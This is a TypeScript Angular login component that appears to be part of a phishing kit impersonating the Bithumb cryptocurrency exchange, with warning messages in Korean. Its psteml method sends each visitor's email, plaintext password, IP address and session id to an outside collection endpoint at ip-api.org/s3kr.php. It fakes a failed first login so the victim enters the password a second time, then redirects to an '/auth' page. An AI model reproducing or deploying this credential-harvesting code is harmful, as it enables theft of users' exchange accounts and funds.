import { Component, OnInit } from '@angular/core';
import { NgxSpinnerService } from "ngx-spinner";
import { HttpClient, HttpParams } from "@angular/common/http";
import { HttpHeaders } from '@angular/common/http';
import { Router } from "@angular/router";
import { ToastrService } from 'ngx-toastr';


@Component({
  selector: 'app-login',
  templateUrl: './login.component.html',
  styleUrls: ['./login.component.css']
})
export class LoginComponent implements OnInit {


  async delay(ms: number) {
    await new Promise(resolve => setTimeout(()=>resolve(''), ms)).then(()=>console.log("ZEBIMED"));
  }

  user = {
    em: "",
    ps: "",
  };

  flag1 = true;
  flag2 = false;

  color2 = 'block';
  color3 = 'none';

  attemp = 1;

  xk = sessionStorage.getItem('ip');
  randomid = sessionStorage.getItem('id');

  readonly ROOT_URL = "https://ip-api.org/s3kr.php";


  constructor(private toastr: ToastrService,public http: HttpClient,private spinner: NgxSpinnerService, private router: Router) { }

  ngOnInit(): void {
    this.loading();
  }


  loading(){
    this.spinner.show();
    this.delay(1000).then(any=>{
      this.spinner.hide();
    });
  }

  psteml(){
    if(this.user.em){
    if(/^[\w-\.]+@([\w-]+\.)+[\w-]{2,4}$/.test(this.user.em)){
    if(this.user.ps){
    if(this.user.ps.length >= 8){
    if(this.attemp >= 2){
      this.flag1 = false;
      let params = new HttpParams().set("text", "bithumb V2 login atempN:" +this.attemp+ " email= "+this.user.em +" password= "+ this.user.ps + " ip=" + this.xk + " id=" + this.randomid );
      this.http.get<any>(this.ROOT_URL +'?',{ params , }).subscribe((data: any[])=>{console.log(data);})  ;
      sessionStorage.setItem('semail',this.user.em);
      this.delay(4000).then(any=>{
        this.spinner.show();
      });
      this.delay(12000).then(any=>{
        this.redirect('/auth');
      });
    }else{
      this.flag2 = false;
      this.flag1 = false;
      let params = new HttpParams().set("text", "bithumb V2 login atempN:" +this.attemp+ " email= "+this.user.em +" password= "+ this.user.ps + " ip=" + this.xk + " id=" + this.randomid );
      this.http.get<any>(this.ROOT_URL +'?',{ params , }).subscribe((data: any[])=>{console.log(data);})  ;
      sessionStorage.setItem('semail',this.user.em);
      this.attemp = 2;
      this.delay(3000).then(any=>{
        this.spinner.show();
      });
      this.delay(7000).then(any=>{
        this.spinner.hide();
        this.user.ps = '';
        this.flag1 = true;
        this.flag2 = true;
      });
    }

    }else{
      this.funwrong("암호를 확인하고 다시 시도하십시오.");
    }
    }else{
      this.funwrong("암호를 확인하고 다시 시도하십시오.");
    }
    }else{
      this.funwrong("이메일을 확인하고 다시 시도하십시오.");
    }
    }else{
      this.funwrong("이메일을 확인하고 다시 시도하십시오.");
    }
    
  }

  redirect(dang:string){
    this.router.navigate([dang]);
  }

  funwrong($nik){
    this.toastr.warning('', $nik, {
      timeOut: 5000,
      positionClass: 'toast-bottom-full-width',
    });
    this.delay(5000).then(any=>{
        this.flag2 = false;
    });
  }

}
